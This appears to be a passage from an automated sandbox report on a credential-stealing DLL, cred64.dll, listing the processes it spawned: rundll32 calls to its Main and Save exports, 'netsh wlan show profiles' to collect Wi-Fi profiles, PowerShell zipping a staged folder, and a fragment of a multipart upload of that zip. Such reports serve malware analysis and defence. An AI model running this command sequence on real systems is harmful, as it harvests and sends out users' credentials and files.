                                                                      Data Ascii: ------MzA4NA==Content-Disposition: form-data; name="data"; filename="246122658369_Desktop.zip"Content-Type: application/octet-stream


                                                                      Target ID:0
                                                                      Start time:00:38:00
                                                                      Start date:23/12/2024
                                                                      Path:C:\Windows\System32\loaddll64.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:loaddll64.exe "C:\Users\user\Desktop\cred64.dll.dll"
                                                                      Imagebase:0x7ff776540000
                                                                      File size:165'888 bytes
                                                                      MD5 hash:763455F9DCB24DFEECC2B9D9F8D46D52
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:1
                                                                      Start time:00:38:00
                                                                      Start date:23/12/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff7699e0000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:2
                                                                      Start time:00:38:00
                                                                      Start date:23/12/2024
                                                                      Path:C:\Windows\System32\cmd.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\cred64.dll.dll",#1
                                                                      Imagebase:0x7ff749870000
                                                                      File size:289'792 bytes
                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:3
                                                                      Start time:00:38:00
                                                                      Start date:23/12/2024
                                                                      Path:C:\Windows\System32\rundll32.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:rundll32.exe C:\Users\user\Desktop\cred64.dll.dll,Main
                                                                      Imagebase:0x7ff665ff0000
                                                                      File size:71'680 bytes
                                                                      MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:4
                                                                      Start time:00:38:00
                                                                      Start date:23/12/2024
                                                                      Path:C:\Windows\System32\rundll32.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:rundll32.exe "C:\Users\user\Desktop\cred64.dll.dll",#1
                                                                      Imagebase:0x7ff665ff0000
                                                                      File size:71'680 bytes
                                                                      MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:5
                                                                      Start time:00:38:01
                                                                      Start date:23/12/2024
                                                                      Path:C:\Windows\System32\netsh.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:netsh wlan show profiles
                                                                      Imagebase:0x7ff768ff0000
                                                                      File size:96'768 bytes
                                                                      MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:moderate
                                                                      Has exited:true

                                                                      Target ID:6
                                                                      Start time:00:38:01
                                                                      Start date:23/12/2024
                                                                      Path:C:\Windows\System32\netsh.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:netsh wlan show profiles
                                                                      Imagebase:0x7ff768ff0000
                                                                      File size:96'768 bytes
                                                                      MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:moderate
                                                                      Has exited:true

                                                                      Target ID:7
                                                                      Start time:00:38:01
                                                                      Start date:23/12/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff7699e0000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:8
                                                                      Start time:00:38:01
                                                                      Start date:23/12/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff7699e0000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:9
                                                                      Start time:00:38:03
                                                                      Start date:23/12/2024
                                                                      Path:C:\Windows\System32\rundll32.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:rundll32.exe C:\Users\user\Desktop\cred64.dll.dll,Save
                                                                      Imagebase:0x7ff665ff0000
                                                                      File size:71'680 bytes
                                                                      MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:10
                                                                      Start time:00:38:06
                                                                      Start date:23/12/2024
                                                                      Path:C:\Windows\System32\rundll32.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:rundll32.exe "C:\Users\user\Desktop\cred64.dll.dll",Main
                                                                      Imagebase:0x7ff665ff0000
                                                                      File size:71'680 bytes
                                                                      MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      Target ID:11
                                                                      Start time:00:38:06
                                                                      Start date:23/12/2024
                                                                      Path:C:\Windows\System32\rundll32.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:rundll32.exe "C:\Users\user\Desktop\cred64.dll.dll",Save
                                                                      Imagebase:0x7ff665ff0000
                                                                      File size:71'680 bytes
                                                                      MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      Target ID:12
                                                                      Start time:00:38:07
                                                                      Start date:23/12/2024
                                                                      Path:C:\Windows\System32\netsh.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:netsh wlan show profiles
                                                                      Imagebase:0x7ff768ff0000
                                                                      File size:96'768 bytes
                                                                      MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      Target ID:13
                                                                      Start time:00:38:07
                                                                      Start date:23/12/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff7699e0000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      Target ID:17
                                                                      Start time:00:38:23
                                                                      Start date:23/12/2024
                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal
                                                                      Imagebase:0x7ff788560000
                                                                      File size:452'608 bytes
                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      Target ID:18
                                                                      Start time:00:38:23
                                                                      Start date:23/12/2024
                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal
                                                                      Imagebase:0x7ff788560000
                                                                      File size:452'608 bytes
                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      Target ID:19
                                                                      Start time:00:38:23
                                                                      Start date:23/12/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff7699e0000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      Target ID:20
                                                                      Start time:00:38:23
                                                                      Start date:23/12/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff7699e0000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      Target ID:21
                                                                      Start time:00:38:30
                                                                      Start date:23/12/2024
                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal
                                                                      Imagebase:0x7ff788560000
                                                                      File size:452'608 bytes
                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      Target ID:22
                                                                      Start time:00:38:30
                                                                      Start date:23/12/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff7699e0000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true
